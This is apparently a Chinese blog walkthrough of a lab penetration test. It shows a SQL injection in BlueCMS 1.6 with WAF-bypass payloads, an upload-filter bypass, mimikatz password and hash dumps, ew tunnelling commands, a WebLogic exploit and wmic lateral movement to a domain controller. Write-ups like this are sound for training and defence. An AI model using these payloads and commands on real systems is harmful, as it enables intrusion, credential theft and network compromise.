實戰|記一次內網靶機滲透測試
VSole2021-07-29 12:26:03
靶機環境-魔改的紅日6,修改了bluecms源碼;
外網Web:192.168.140.131/192.168.111.128
內網Web:192.168.111.80/10.10.10.80
DC:10.10.10.10
0x01 外網web
首先來到外網web:
可以看到開放了80訪問看看
可以看到是bluecms 1.6。這個cms很多漏洞,網上下載一套看看。
1.1 代碼審計
全文搜索下$_GET
來到ad_js.php
$ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : '';
if(empty($ad_id))
{
echo 'Error!';
exit();
}
$ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id);
if($ad['time_set'] == 0)
{
$ad_content = $ad['content'];
}
else
{
if($ad['end_time'] < time())
{
$ad_content = $ad['exp_content'];
}
else
{
$ad_content = $ad['content'];
}
}
可以看到如果ad_id不為空就刪除兩邊的空白符號,否則輸出Error,然后就會執行getone方法,跟蹤下getone。
function getone($sql, $type=MYSQL_ASSOC){
$query = $this->query($sql,$this->linkid);
$row = mysql_fetch_array($query, $type);
return $row;
}
可以看到沒有做任何過濾,直接帶入了執行了sql語句。
http://192.168.140.131/ad_js.php?ad_id=1 and 1=1
可以看到存在waf。
1.2 waf繞過
fuzz下加上/"%!* 來干擾。 繞過order by
ad_js.php?ad_id=1/%//order////by////8
http://192.168.140.131/ad_js.php?ad_id=1/*%%2f*/order/*%2f%2f*/by/*%2f%2f*/8
ad_js.php?ad_id=1/%//order////by////7
繞過union select
ad_js.php?ad_id=-1/*%/*/union/*//*/select/*//*/1,2,3,4,5,6,7
全部被攔截,加上/!50001/再來跑
/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,7
返回包:
HTTP/1.1 200 OK Date: Sun, 25 Jul 2021 10:29:14 GMT Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29 Set-Cookie: BLUE[user_id]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly Set-Cookie: BLUE[user_name]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly Set-Cookie: BLUE[user_pwd]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly Content-Length: 33 Connection: close Content-Type: text/html;charset=gb2312
獲取當前表:正常語句:
union select 1,2,3,4,5,6,group_concat(table_name), from information_schema.tables where table_schema=database()
套用上面的被攔截,逐條測試哪里被攔截了
發現只要不存在database()就不會被攔截
同理fuzz括號里面就行 bypass payload:
/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,group_concat(table_name) from information_schema.tables where table_schema=database(/*%!"/*/
返回包:
HTTP/1.1 200 OK Date: Sun, 25 Jul 2021 10:37:08 GMT Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29 Set-Cookie: BLUE[user_id]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly Set-Cookie: BLUE[user_name]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly Set-Cookie: BLUE[user_pwd]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly Content-Length: 401 Connection: close Content-Type: text/html;charset=gb2312
可以看到存在blue_admin表,查看該表存在的字段
正常語句:
union select 1,2,3,4,5,6,group_concat(column_name) from information_schema.columns where table_name='blue_admin'
單引號過濾hex編碼下
bypass payload:
/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x626C75655F61646D696E
返回包:
HTTP/1.1 200 OK Date: Sun, 25 Jul 2021 11:03:52 GMT Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29 Set-Cookie: BLUE[user_id]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly Set-Cookie: BLUE[user_name]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly Set-Cookie: BLUE[user_pwd]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly Content-Length: 108 Connection: close Content-Type: text/html;charset=gb2312
存在admin_name,pwd
獲取賬密正常語句套同樣的過濾語句:blue_admin:
/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,group_concat(admin_name)%20from%20blue_admin
返回包:
HTTP/1.1 200 OK Date: Sun, 25 Jul 2021 11:08:14 GMT Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29 Set-Cookie: BLUE[user_id]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly Set-Cookie: BLUE[user_name]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly Set-Cookie: BLUE[user_pwd]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly Content-Length: 37 Connection: close Content-Type: text/html;charset=gb2312
pwd:
/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,group_concat(pwd)%20from%20blue_admin
返回包:
HTTP/1.1 200 OK Date: Sun, 25 Jul 2021 11:09:17 GMT Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29 Set-Cookie: BLUE[user_id]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly Set-Cookie: BLUE[user_name]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly Set-Cookie: BLUE[user_pwd]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly Content-Length: 64 Connection: close Content-Type: text/html;charset=gb2312
獲得賬密:admin/test123
1.3 后臺getshell
這里嘗試了文件包含發現不行,發現robots.txt下存在test目錄的upload.html文件
直接被攔截了
這里我們可以修改
Content-Disposition: form-data; name="file"; filename="t.php"
為
Content-Disposition: form-data; name="file"; filename=; filename="t.php"
來繞過
0x02 內網滲透
可以看到權限還是挺高的。存在111段
上傳ew到web靶機
執行
ew.exe -s ssocksd -l 1266
添加用戶上去,mimikatz抓密碼
aspnet 161cff084477fe596a5db81874498a24(1qaz@WSX) itsec 852a844adfce18f66009b4f14e0a98de(test123..) Administrator 852a844adfce18f66009b4f14e0a98de(test123..)
c段發現存在80
存在administrator用戶明文看看能不能直接ipc
密碼不對。開放了80和7001
80沒啥東西7001為weblogic
存在CVE-2019-2725
拿下內網weblogic
可以看到存在域de1ay.com,拿到了本地管理員權限。
存在10.10.10段
抓下密碼:
* Username : de1ay * Domain : WEB * NTLM : cb5141dcdaa451b0972f3144fda5b3cd * SHA1 : c25aadf268b15742f54e1ca78d54b1da417d5f8d * Password : 1qaz@WSX1qaz@WSX User : Administrator Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0(可能沒啟用)
設置多層代理 attack ip:192.168.140.1 web:192.168.140.131/192.168.111.128 weblogic:192.168.111.80/10.10.10.80
上傳ew到weblogic機器上執行監聽本地8888端口:
ew.exe -s ssocksd -l 8888
在攻擊機器上執行,把本地端口1080跟web的9999端口綁定:
ew.exe -s lcx_tran -l 1080 -f 192.168.140.131 -g 9999
在web機器上將本地的9999跟weblogic的8888綁定:
ew.exe -s lcx_tran -l 9999 -f 192.168.111.80 -g 8888
發現存在10機器。
用現有的密碼加上域用戶嘗試爆破
user:
de1ay\administrator de1ay\de1ay
pass:
1qaz@WSX test123.. 1qaz@WSX1qaz@WSX
1.runas獲取域用戶cmd:
runas /user:de1ay\administrator cmd
wmi橫向移動:
wmic /node:10.10.10.10 /user:de1ay\administrator /password:1qaz@WSX1qaz@WSX process call create "cmd /c ipconfig > c:\1.txt"
VSole
網絡安全專家